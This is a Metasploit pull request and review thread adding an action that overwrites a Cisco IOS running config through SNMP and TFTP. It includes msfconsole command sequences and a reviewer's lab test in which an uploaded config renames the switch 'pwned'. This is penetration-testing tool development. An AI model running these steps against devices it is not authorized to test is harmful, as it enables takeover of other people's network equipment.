### PR TITLE
Cisco running config

### PR DESCRIPTION
**Pull request by ct5595**
Edit Auxiliary Module cisco_upload_file to include override config functionality

  `This module will copy file to a Cisco IOS device using SNMP and TFTP.
        The action Override_Config will override the running config of the Cisco device.
        A read-write SNMP community is required. The SNMP community scanner module can
        assist in identifying a read-write community. The target must
        be able to connect back to the Metasploit system and the use of
        NAT will cause the TFTP transfer to fail.`

The changes replicate the functionality discussed here:
https://www.ciscozine.com/send-cisco-commands-via-snmp/

## Verification

List the steps needed to make sure this thing works

**Note:** examples of Cisco IOS running configs located here: 
http://www.netkiller.cn/cisco/switch.example.html

Recommend to download running config from a test device using the cisco_config_tftp for modification first.

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/snmp/cisco_upload_file`
- [ ] `set community <read-write community string>`
- [ ] `set lhost <your IP address>`
- [ ] `set action Override_Config`
- [ ] `set rhosts <hosts you wish to target>`
- [ ] `set source <path to the new config file>`
- [ ] `set version <version of SNMP you are using (default is 1)>`
- [ ] `set rport <SNMP port (most likely 161)>`
- [ ] **Verify** that the running config has been overridden by using the **auxiliary/scanner/snmp/cisco_config_tftp** module to download the current running config from the device.

## Scenarios

Download the running config from a Cisco device:

`msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run`

`[*] Starting TFTP server...`
`[*] Scanning for vulnerable targets...`
`[*] Trying to acquire configuration from 10.20.205.5...`
`[*] Scanned 1 of 1 hosts (100% complete)`
`[*] Providing some time for transfers to complete...`
`[*] Incoming file from 10.20.205.5 - 10.20.205.5.txt 3892 bytes`
`[*] Shutting down the TFTP service...`
`[*] Auxiliary module execution completed`
`msf5 auxiliary(scanner/snmp/cisco_config_tftp) > `

Upload your new config:

`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private`
`COMMUNITY => private`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164`
`LHOST => 10.20.164.164`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config`
`action => Override_Config`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5`
`rhosts => 10.20.205.5`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig`
`source => /root/Desktop/newconfig`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run`

`[*] Starting TFTP server...`
`[*] Copying file newconfig to 10.20.205.5...`
`[*] Scanned 1 of 1 hosts (100% complete)`
`[*] Providing some time for transfers to complete...`
`[*] Shutting down the TFTP service...`
`[*] Auxiliary module execution completed`

`msf5 auxiliary(scanner/snmp/cisco_upload_file) > `

**Note:** tested on two Cisco switches running Cisco IOS but haven't tested on any routers, access points, etc.

### CODE REVIEW

**Comment by h00die** [comment]
A few things:
1. feel free to add yourself as an author on the module, since youre updating the functionality
2. I was thinking more of an action than a datastore option.  I think that would be the more appropriate spot to expand out since, in theory, more options could be added in the future. See https://github.com/rapid7/metasploit-framework/blob/8786150bdfe1530eb6d4a618e0e54c1f46e6cf78/modules/auxiliary/scanner/http/owa_login.rb as an example of actions
3. the docs https://github.com/rapid7/metasploit-framework/blob/8786150bdfe1530eb6d4a618e0e54c1f46e6cf78/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md need to be updated

**Comment by h00die** [comment]
That shouldn't be an issue.
Still need to update the docs though!
After that i'll give it a thorough review and testing

**Comment by asoto-r7** [comment]
Thanks @ct5595!  I'm standing up a switch to test this out on.  I'll document my progress here:

```
Switch#show version
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(55)SE1, RELEASE SOFTWARE (fc1)
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision N0) with 131072K bytes of memory.
```

It's so new, the hostname is still `Switch`.  😄

Starting from a wiped config, let's set up SNMP using the IP 192.168.77.1/24:

```
Switch>en
Switch#conf t
Switch(config)#snmp-server community public
Switch(config)#snmp-server community public rw
Switch(config-if)#tftp-server flash:config.text 
Switch(config)#exit
Switch(config)#int vlan 1
Switch(config-if)#ip addr 192.168.77.1 255.255.255.0
Switch(config-if)#no shut
Switch(config-if)#end
Switch#write
```

We'll just borrow the config:

```
msf5 auxiliary(scanner/snmp/cisco_upload_file) > use auxiliary/scanner/snmp/cisco_config_tftp
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 192.168.77.2 
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 192.168.77.1
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /tmp
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 192.168.77.1...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 192.168.77.1 - 192.168.77.1.txt 2249 bytes
```

Let's just modify their enable password for them, then take this module for a spin!

```
$ git checkout upstream/pr/11690
HEAD is now at b2f2206943 Update cisco_upload_file.md
$ ./msfconsole -qx 'use auxiliary/scanner/snmp/cisco_upload_file'
msf5 auxiliary(scanner/snmp/cisco_upload_file) > show actions 

Auxiliary actions:

   Name             Description
   ----             -----------
   Override_Config  Override the running config
   Upload_File      Upload the file

msf5 auxiliary(scanner/snmp/cisco_upload_file) > set community public                                                                                                                                                                                                                                                       
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 192.168.77.2
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set RHOSTS 192.168.77.1
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set SOURCE /tmp/192.168.77.1.txt
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set ACTION Override_Config
msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
```

And now let's see what happened to our switch.  Hitting enter on a console line shows:

```
Switch>

pwned>
*Mar  1 04:16:36.123: %SSH-5-ENABLED: SSH 1.99 has been enabled
*Mar  1 04:16:37.557: %PKI-4-NOAUTOSAVE: Configuration was modified.  Issue "write memory" to save new certificateen
*Mar  1 04:16:37.625: %SYS-5-CONFIG_I: Configured from tftp://192.168.77.2/192.168.77.1.txt by console
pwned>
```

Oh look, someone changed our hostname!

Nice work!  👍

**Comment by asoto-r7** [comment]
## Release Notes

The `auxiliary/scanner/snmp/cisco_upload_file` module now supports overwriting Cisco IOS switch configurations via a combination of SNMP and TFTP.

**Comment by asoto-r7** [comment]
@h00die : I apologize -- I just realized that you'd mentioned that you were aiming to test this one.  I hope I didn't step on your toes!  😦

**Comment by h00die** [comment]
i was actually just about to comment that you did an awesome job documenting testing!
My cisco testing device is less than optimal, so glad you got to it.  No toes stepped on, no worries!

**Comment by ct5595** [comment]
Thanks @asoto-r7! Also, thanks to @h00die for helping me through my first contribution!

**Pull request merged**
